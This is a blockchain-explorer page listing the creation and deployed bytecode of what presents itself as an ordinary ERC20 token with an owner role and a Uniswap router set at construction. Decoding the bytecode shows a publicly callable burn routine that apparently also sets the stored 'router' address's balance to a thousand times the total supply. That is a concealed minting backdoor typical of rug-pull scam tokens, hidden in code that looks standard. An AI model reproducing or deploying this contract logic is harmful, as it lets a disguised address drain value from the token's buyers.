0b8146101c2578063313ce567146101cc57806339509351146101f657806341aa6c4614610232576100f2565b806306fdde03146100f6578063095ea7b31461012057806318160ddd1461015c57806323b872dd14610186575b5f80fd5b348015610101575f80fd5b5061010a6103dc565b604051610117919061117a565b60405180910390f35b34801561012b575f80fd5b506101466004803603810190610141919061122b565b61046c565b6040516101539190611283565b60405180910390f35b348015610167575f80fd5b5061017061048e565b60405161017d91906112ab565b60405180910390f35b348015610191575f80fd5b506101ac60048036038101906101a791906112c4565b610497565b6040516101b99190611283565b60405180910390f35b6101ca6104c5565b005b3480156101d7575f80fd5b506101e06105c3565b6040516101ed919061132f565b60405180910390f35b348015610201575f80fd5b5061021c6004803603810190610217919061122b565b6105cb565b6040516102299190611283565b60405180910390f35b34801561023d575f80fd5b5061025860048036038101906102539190611348565b610601565b005b348015610265575f80fd5b50610280600480360381019061027b9190611373565b61060e565b60405161028d91906112ab565b60405180910390f35b3480156102a1575f80fd5b506102aa610653565b005b3480156102b7575f80fd5b506102c0610666565b6040516102cd91906113ad565b60405180910390f35b3480156102e1575f80fd5b506102ea61068e565b6040516102f7919061117a565b60405180910390f35b34801561030b575f80fd5b506103266004803603810190610321919061122b565b61071e565b6040516103339190611283565b60405180910390f35b348015610347575f80fd5b50610362600480360381019061035d919061122b565b610793565b60405161036f9190611283565b60405180910390f35b348015610383575f80fd5b5061039e600480360381019061039991906113c6565b6107b5565b6040516103ab91906112ab565b60405180910390f35b3480156103bf575f80fd5b506103da60048036038101906103d59190611373565b610837565b005b6060600480546103eb90611431565b80601f016020809104026020016040519081016040528092919081815260200182805461041790611431565b80156104625780601f1061043957610100808354040283529160200191610462565b820191905f5260205f20905b81548152906001019060200180831161044557829003601f168201915b5050505050905090565b5f806104766108b9565b90506104838185856108c0565b600191505092915050565b5f600254905090565b5f806104a16108b9565b90506104ae858285610a83565b6104b9858585610b0e565b60019150509392505050565b6104f93060035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166104f43061060e565b6108c0565b60035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71934306105413061060e565b61054a3061060e565b34610553610666565b426040518863ffffffff1660e01b815260040161057596959493929190611461565b60606040518083038185885af1158015610591573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906105b691906114d4565b5050506105c1610653565b565b5f6012905090565b5f806105d56108b9565b90506105f68185856105e785896107b5565b6105f19190611551565b6108c0565b600191505092915050565b61060b3382610d7a565b50565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61065b610fa5565b6106645f611023565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461069d90611431565b80601f01602080910402602001604051908101604052809291908181526020018280546106c990611431565b80156107145780601f106106eb57610100808354040283529160200191610714565b820191905f5260205f20905b8154815290600101906020018083116106f757829003601f168201915b5050505050905090565b5f806107286108b9565b90505f61073582866107b5565b90508381101561077a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610771906115f4565b60405180910390fd5b61078782868684036108c0565b60019250505092915050565b5f8061079d6108b9565b90506107aa818585610b0e565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61083f610fa5565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a490611682565b60405180910390fd5b6108b681611023565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361092e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092590611710565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361099c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109939061179e565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a7691906112ab565b60405180910390a3505050565b5f610a8e84846107b5565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b085781811015610afa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af190611806565b60405180910390fd5b610b0784848484036108c0565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7390611894565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be190611922565b60405180910390fd5b610bf58383836110e6565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610c78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6f906119b0565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d6191906112ab565b60405180910390a3610d748484846110eb565b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610de8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ddf90611a3e565b60405180910390fd5b610df3825f836110e6565b5f805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610e76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6d90611acc565b60405180910390fd5b8181035f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506103e8600254025f8060035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f82825403925050819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f8d91906112ab565b60405180910390a3610fa0835f846110eb565b505050565b610fad6108b9565b73ffffffffffffffffffffffffffffffffffffffff16610fcb610666565b73ffffffffffffffffffffffffffffffffffffffff1614611021576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101890611b34565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561112757808201518184015260208101905061110c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61114c826110f0565b61115681856110fa565b935061116681856020860161110a565b61116f81611132565b840191505092915050565b5f6020820190508181035f8301526111928184611142565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6111c78261119e565b9050919050565b6111d7816111bd565b81146111e1575f80fd5b50565b5f813590506111f2816111ce565b92915050565b5f819050919050565b61120a816111f8565b8114611214575f80fd5b50565b5f8135905061122581611201565b92915050565b5f80604083850312156112415761124061119a565b5b5f61124e858286016111e4565b925050602061125f85828601611217565b9150509250929050565b5f8115159050919050565b61127d81611269565b82525050565b5f6020820190506112965f830184611274565b92915050565b6112a5816111f8565b82525050565b5f6020820190506112be5f83018461129c565b92915050565b5f805f606084860312156112db576112da61119a565b5b5f6112e8868287016111e4565b93505060206112f9868287016111e4565b925050604061130a86828701611217565b9150509250925092565b5f60ff82169050919050565b61132981611314565b82525050565b5f6020820190506113425f830184611320565b92915050565b5f6020828403121561135d5761135c61119a565b5b5f61136a84828501611217565b91505092915050565b5f602082840312156113885761138761119a565b5b5f611395848285016111e4565b91505092915050565b6113a7816111bd565b82525050565b5f6020820190506113c05f83018461139e565b92915050565b5f80604083850312156113dc576113db61119a565b5b5f6113e9858286016111e4565b92505060206113fa858286016111e4565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061144857607f821691505b60208210810361145b5761145a611404565b5b50919050565b5f60c0820190506114745f83018961139e565b611481602083018861129c565b61148e604083018761129c565b61149b606083018661129c565b6114a8608083018561139e565b6114b560a083018461129c565b979650505050505050565b5f815190506114ce81611201565b92915050565b5f805f606084860312156114eb576114ea61119a565b5b5f6114f8868287016114c0565b9350506020611509868287016114c0565b925050604061151a868287016114c0565b9150509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61155b826111f8565b9150611566836111f8565b925082820190508082111561157e5761157d611524565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6115de6025836110fa565b91506115e982611584565b604082019050919050565b5f6020820190508181035f83015261160b816115d2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61166c6026836110fa565b915061167782611612565b604082019050919050565b5f6020820190508181035f83015261169981611660565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6116fa6024836110fa565b9150611705826116a0565b604082019050919050565b5f6020820190508181035f830152611727816116ee565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6117886022836110fa565b91506117938261172e565b604082019050919050565b5f6020820190508181035f8301526117b58161177c565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6117f0601d836110fa565b91506117fb826117bc565b602082019050919050565b5f6020820190508181035f83015261181d816117e4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61187e6025836110fa565b915061188982611824565b604082019050919050565b5f6020820190508181035f8301526118ab81611872565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61190c6023836110fa565b9150611917826118b2565b604082019050919050565b5f6020820190508181035f83015261193981611900565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61199a6026836110fa565b91506119a582611940565b604082019050919050565b5f6020820190508181035f8301526119c78161198e565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f611a286021836110fa565b9150611a33826119ce565b604082019050919050565b5f6020820190508181035f830152611a5581611a1c565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ab66022836110fa565b9150611ac182611a5c565b604082019050919050565b5f6020820190508181035f830152611ae381611aaa565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611b1e6020836110fa565b9150611b2982611aea565b602082019050919050565b5f6020820190508181035f830152611b4b81611b12565b905091905056fea2646970667358221220c2b6b9a9fff1af14c59fe4190e0de2834d7a48f4bd902fa10f474cb63be32f5364736f6c6343000814003300000000000000000000000087f928717077039a6b8fa2eac9724cf36666f70e

Deployed Bytecode

0x6080604052600436106100f2575f3560e01c806370a0823111610089578063a457c2d711610058578063a457c2d714610300578063a9059cbb1461033c578063dd62ed3e14610378578063f2fde38b146103b4576100f2565b806370a082311461025a578063715018a6146102965780638da5cb5b146102ac57806395d89b41146102d6576100f2565b8063293230b8116100c5578063293230b8146101c2578063313ce567146101cc57806339509351146101f657806341aa6c4614610232576100f2565b806306fdde03146100f6578063095ea7b31461012057806318160ddd1461015c57806323b872dd14610186575b5f80fd5b348015610101575f80fd5b5061010a6103dc565b604051610117919061117a565b60405180910390f35b34801561012b575f80fd5b506101466004803603810190610141919061122b565b61046c565b6040516101539190611283565b60405180910390f35b348015610167575f80fd5b5061017061048e565b60405161017d91906112ab565b60405180910390f35b348015610191575f80fd5b506101ac60048036038101906101a791906112c4565b610497565b6040516101b99190611283565b60405180910390f35b6101ca6104c5565b005b3480156101d7575f80fd5b506101e06105c3565b6040516101ed919061132f565b60405180910390f35b348015610201575f80fd5b5061021c6004803603810190610217919061122b565b6105cb565b6040516102299190611283565b60405180910390f35b34801561023d575f80fd5b5061025860048036038101906102539190611348565b610601565b005b348015610265575f80fd5b50610280600480360381019061027b9190611373565b61060e565b60405161028d91906112ab565b60405180910390f35b3480156102a1575f80fd5b506102aa610653565b005b3480156102b7575f80fd5b506102c0610666565b6040516102cd91906113ad565b60405180910390f35b3480156102e1575f80fd5b506102ea61068e565b6040516102f7919061117a565b60405180910390f35b34801561030b575f80fd5b506103266004803603810190610321919061122b565b61071e565b6040516103339190611283565b60405180910390f35b348015610347575f80fd5b50610362600480360381019061035d919061122b565b610793565b60405161036f9190611283565b60405180910390f35b348015610383575f80fd5b5061039e600480360381019061039991906113c6565b6107b5565b6040516103ab91906112ab565b60405180910390f35b3480156103bf575f80fd5b506103da60048036038101906103d59190611373565b610837565b005b6060600480546103eb90611431565b80601f016020809104026020016040519081016040528092919081815260200182805461041790611431565b80156104625780601f1061043957610100808354040283529160200191610462565b820191905f5260205f20905b81548152906001019060200180831161044557829003601f168201915b5050505050905090565b5f806104766108b9565b90506104838185856108c0565b600191505092915050565b5f600254905090565b5f806104a16108b9565b90506104ae858285610a83565b6104b9858585610b0e565b60019150509392505050565b6104f93060035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff166104f43061060e565b6108c0565b60035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d71934306105413061060e565b61054a3061060e565b34610553610666565b426040518863ffffffff1660e01b815260040161057596959493929190611461565b60606040518083038185885af1158015610591573d5f803e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906105b691906114d4565b5050506105c1610653565b565b5f6012905090565b5f806105d56108b9565b90506105f68185856105e785896107b5565b6105f19190611551565b6108c0565b600191505092915050565b61060b3382610d7a565b50565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61065b610fa5565b6106645f611023565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461069d90611431565b80601f01602080910402602001604051908101604052809291908181526020018280546106c990611431565b80156107145780601f106106eb57610100808354040283529160200191610714565b820191905f5260205f20905b8154815290600101906020018083116106f757829003601f168201915b5050505050905090565b5f806107286108b9565b90505f61073582866107b5565b90508381101561077a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610771906115f4565b60405180910390fd5b61078782868684036108c0565b60019250505092915050565b5f8061079d6108b9565b90506107aa818585610b0e565b600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61083f610fa5565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036108ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108a490611682565b60405180910390fd5b6108b681611023565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361092e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092590611710565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361099c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109939061179e565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a7691906112ab565b60405180910390a3505050565b5f610a8e84846107b5565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610b085781811015610afa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af190611806565b60405180910390fd5b610b0784848484036108c0565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b7c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b7390611894565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610be190611922565b60405180910390fd5b610bf58383836110e6565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610c78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6f906119b0565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d6191906112ab565b60405180910390a3610d748484846110eb565b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610de8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ddf90611a3e565b60405180910390fd5b610df3825f836110e6565b5f805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610e76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e6d90611acc565b60405180910390fd5b8181035f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055506103e8600254025f8060035f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160025f82825403925050819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f8d91906112ab565b60405180910390a3610fa0835f846110eb565b505050565b610fad6108b9565b73ffffffffffffffffffffffffffffffffffffffff16610fcb610666565b73ffffffffffffffffffffffffffffffffffffffff1614611021576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101890611b34565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561112757808201518184015260208101905061110c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f61114c826110f0565b61115681856110fa565b935061116681856020860161110a565b61116f81611132565b840191505092915050565b5f6020820190508181035f8301526111928184611142565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6111c78261119e565b9050919050565b6111d7816111bd565b81146111e1575f80fd5b50565b5f813590506111f2816111ce565b92915050565b5f819050919050565b61120a816111f8565b8114611214575f80fd5b50565b5f8135905061122581611201565b92915050565b5f80604083850312156112415761124061119a565b5b5f61124e858286016111e4565b925050602061125f85828601611217565b9150509250929050565b5f8115159050919050565b61127d81611269565b82525050565b5f6020820190506112965f830184611274565b92915050565b6112a5816111f8565b82525050565b5f6020820190506112be5f83018461129c565b92915050565b5f805f606084860312156112db576112da61119a565b5b5f6112e8868287016111e4565b93505060206112f9868287016111e4565b925050604061130a86828701611217565b9150509250925092565b5f60ff82169050919050565b61132981611314565b82525050565b5f6020820190506113425f830184611320565b92915050565b5f6020828403121561135d5761135c61119a565b5b5f61136a84828501611217565b91505092915050565b5f602082840312156113885761138761119a565b5b5f611395848285016111e4565b91505092915050565b6113a7816111bd565b82525050565b5f6020820190506113c05f83018461139e565b92915050565b5f80604083850312156113dc576113db61119a565b5b5f6113e9858286016111e4565b92505060206113fa858286016111e4565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061144857607f821691505b60208210810361145b5761145a611404565b5b50919050565b5f60c0820190506114745f83018961139e565b611481602083018861129c565b61148e604083018761129c565b61149b606083018661129c565b6114a8608083018561139e565b6114b560a083018461129c565b979650505050505050565b5f815190506114ce81611201565b92915050565b5f805f606084860312156114eb576114ea61119a565b5b5f6114f8868287016114c0565b9350506020611509868287016114c0565b925050604061151a868287016114c0565b9150509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61155b826111f8565b9150611566836111f8565b925082820190508082111561157e5761157d611524565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6115de6025836110fa565b91506115e982611584565b604082019050919050565b5f6020820190508181035f83015261160b816115d2565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f61166c6026836110fa565b915061167782611612565b604082019050919050565b5f6020820190508181035f83015261169981611660565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6116fa6024836110fa565b9150611705826116a0565b604082019050919050565b5f6020820190508181035f830152611727816116ee565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f6117886022836110fa565b91506117938261172e565b604082019050919050565b5f6020820190508181035f8301526117b58161177c565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6117f0601d836110fa565b91506117fb826117bc565b602082019050919050565b5f6020820190508181035f83015261181d816117e4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f61187e6025836110fa565b915061188982611824565b604082019050919050565b5f6020820190508181035f8301526118ab81611872565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f61190c6023836110fa565b9150611917826118b2565b604082019050919050565b5f6020820190508181035f83015261193981611900565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61199a6026836110fa565b91506119a582611940565b604082019050919050565b5f6020820190508181035f8301526119c78161198e565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f611a286021836110fa565b9150611a33826119ce565b604082019050919050565b5f6020820190508181035f830152611a5581611a1c565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f611ab66022836110fa565b9150611ac182611a5c565b604082019050919050565b5f6020820190508181035f830152611ae381611aaa565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611b1e6020836110fa565b9150611b2982611aea565b602082019050919050565b5f6020820190508181035f830152611b4b81611b12565b905091905056fea2646970667358221220c2b6b9a9fff1af14c59fe4190e0de2834d7a48f4bd902fa10f474cb63be32f5364736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000087f928717077039a6b8fa2eac9724cf36666f70e

-----Decoded View---------------
Arg [0] : uniswapV2Router (address): 0x87F928717077039a6b8fa2eaC9724CF36666F70E

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000087f928717077039a6b8fa2eac9724cf36666f70e


Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.